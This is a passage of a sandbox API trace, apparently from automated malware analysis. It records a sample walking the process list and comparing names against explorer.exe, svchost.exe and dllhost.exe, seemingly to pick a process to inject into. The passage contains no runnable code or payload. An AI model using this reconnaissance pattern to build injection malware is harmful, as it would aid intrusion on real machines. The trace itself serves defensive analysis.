[0197.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0197.829] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0197.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0197.830] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.830] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.830] CloseHandle (hObject=0xec) returned 1 [0197.830] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0197.830] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0197.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0197.831] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0197.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0197.831] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.831] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.831] CloseHandle (hObject=0xec) returned 1 [0197.831] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0197.831] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0197.831] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0197.832] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0197.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0197.832] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.832] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.832] CloseHandle (hObject=0xec) returned 1 [0197.832] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0197.832] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0197.832] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0197.832] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0197.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0197.833] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.833] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.833] CloseHandle (hObject=0xec) returned 1 [0197.833] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0197.833] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0197.833] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0197.833] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0197.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0197.834] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.834] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.834] CloseHandle (hObject=0xec) returned 1 [0197.834] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0197.834] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0197.834] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0197.834] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0197.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0197.834] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.834] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.834] CloseHandle (hObject=0xec) returned 1 [0197.834] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0197.834] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0197.834] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0197.834] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0197.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0197.835] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.835] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.835] CloseHandle (hObject=0xec) returned 1 [0197.835] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0197.835] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0197.835] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0197.835] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0197.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0197.836] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.836] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.836] CloseHandle (hObject=0xec) returned 1 [0197.836] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0197.836] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0197.836] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0197.836] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0197.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0197.836] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.836] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.836] CloseHandle (hObject=0xec) returned 1 [0197.836] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0197.836] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0197.837] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0197.837] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0197.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0197.837] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.837] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.837] CloseHandle (hObject=0xec) returned 1 [0197.837] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0197.837] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0197.837] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0197.837] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0197.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0197.838] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.838] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.838] CloseHandle (hObject=0xec) returned 1 [0197.838] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0197.838] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0197.838] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0197.838] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0197.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0197.838] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.838] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.838] CloseHandle (hObject=0xec) returned 1 [0197.839] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0197.839] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0197.839] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0197.839] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0197.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0197.839] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.839] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.839] CloseHandle (hObject=0xec) returned 1 [0197.839] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0197.839] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0197.839] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0197.839] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0197.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0197.840] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.840] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.840] CloseHandle (hObject=0xec) returned 1 [0197.840] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0197.840] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0197.840] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0197.840] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0197.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0197.840] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.840] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.841] CloseHandle (hObject=0xec) returned 1 [0197.841] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0197.841] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0197.841] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0197.841] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0197.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0197.841] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.841] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.841] CloseHandle (hObject=0xec) returned 1 [0197.842] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0197.842] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0197.842] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0197.842] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0197.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0197.842] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.842] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.842] CloseHandle (hObject=0xec) returned 1 [0197.842] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0197.842] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0197.842] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0197.842] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0197.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0197.843] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.843] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.843] CloseHandle (hObject=0xec) returned 1 [0197.843] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0197.843] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0197.843] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0197.843] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0197.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0197.843] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.844] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.844] CloseHandle (hObject=0xec) returned 1 [0197.844] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0197.844] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0197.844] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0197.844] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0197.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0197.844] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.844] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.844] CloseHandle (hObject=0xec) returned 1 [0197.844] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0197.844] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0197.844] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0197.844] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0197.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0197.845] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.845] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.845] CloseHandle (hObject=0xec) returned 1 [0197.845] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0197.845] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0197.845] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0197.845] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0197.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0197.846] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.846] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.846] CloseHandle (hObject=0xec) returned 1 [0197.846] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0197.846] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0197.846] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0197.846] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0197.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0197.846] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0197.847] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0197.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0197.847] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0197.855] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0197.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0197.855] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0197.856] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0197.856] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.856] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.856] CloseHandle (hObject=0xec) returned 1 [0197.856] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0197.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0197.857] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.857] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.857] CloseHandle (hObject=0xec) returned 1 [0197.857] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0197.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0197.857] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0197.858] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.858] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.858] CloseHandle (hObject=0xec) returned 1 [0197.858] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0197.858] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, 